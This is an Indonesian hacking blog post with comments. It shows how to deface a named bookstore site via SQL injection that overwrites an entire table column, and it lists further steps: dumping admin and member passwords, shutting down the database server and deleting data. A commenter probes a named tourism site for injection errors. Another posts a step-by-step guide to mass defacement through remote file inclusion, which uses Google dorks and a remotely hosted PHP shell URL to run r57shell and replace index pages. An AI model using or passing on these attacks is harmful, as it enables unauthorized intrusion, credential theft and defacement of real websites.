SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.id.wikipedia.org/detil_newsevent.asp?id=061110102137%20‘update+td_new sevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATC H%20YOUR%20SYSTEM ‘;– Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!! Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A Apa cuma itu yang bisa kita laku’in tentu TIDAAAAKKK!!!! kalo ditelusuri lagi kita bisa : - Menambahkan isi database_Nya….pake perintah ‘Insert - mematikan Sql server….pake perintah ;shutdown - mencari username admin n passwordnya… pake perintah union+select ato convert - mencari username member n passwordnya - deface satu halaman ato mungkin Nge_Remote - mendelete database - masih banyak lagi dahhhh cape neyy dah malem Kritik,Saran,Cacian n Makian mail To [email protected] kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya This entry was posted on Nopember 1, 2007 at 8:08 am and is filed under HackingCracking-Carding dan Sejenisnya. You can subscribe via RSS 2.0 feed to this post's comments. You can comment below, or link to this permanent URL from your own site. 5 Comments on “Deface: SQL Injection Part-1” 1. joe Says: Maret 4, 2008 at 8:56 am
mas.. ini bisa buat testing gak? http://www.gianyartourism.com/id.news.asp?lihat=detail&id=N77668670 MrSinggih : Coba ya mas … http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘ Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg=’A98435693”’. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Having1 =1Microsoft JET Database Engine error ‘80040e14′ Syntax error (missing operator) in query expression ‘id_keg=’A98435693′Having1=1-”. /id.agenda.asp, line 51 http://www.gianyartourism.com/id.agenda.asp?lihat=detail&id=A98435693‘Group% 20by%20id_keg.’A98435693′Microsoft JET Database Engine error ‘80040e14′ Syntax error in string in query expression ‘id_keg.’A98435693′-”. /id.agenda.asp, line 51 Dst…. :-) :-) Nanti saya ndak keterusan mas. Di coba sendiri saja. Monggo Balas 2. Singgih Kumoro Says: Maret 27, 2008 at 12:48 am Tutorial Cara deface yang Nyaman dan Enak Tenan … 1. Buka http://www.milw0rm. com 2. klik Search 3. ketik RFI (Remote File Inclusion) 4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal 5. Buka Google, dan liat Advisor yang kita pilih tersebut 6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut 7. Setelah dapat hasil dari Google, klik kanan Open NewTab [Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB] 8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya 9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang
terdapat di advisor 10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found. 11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain. 12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error, 13. Ganti command exploit setelah tanda ‘=’[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif] 14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilkan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion 15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memiliki full akses atau -rwxrwxrwx / -rw-rw-rw <– untuk file | drwxrwxrwx / drw-rw-rw <– untuk direktory 16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama decoding dikibarkan disana… 17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi (Original post by ping_win) Balas
Related Documents
Kako To Hack Web Stranice
May 2020 3
Kako Dalje
October 2019 20
Sql
October 2019 20
Sql
June 2020 12
Sql
November 2019 11More Documents from ""
Kasaysayan At Hacker Kraker
May 2020 3
Kako To Hack Web Stranice
May 2020 3
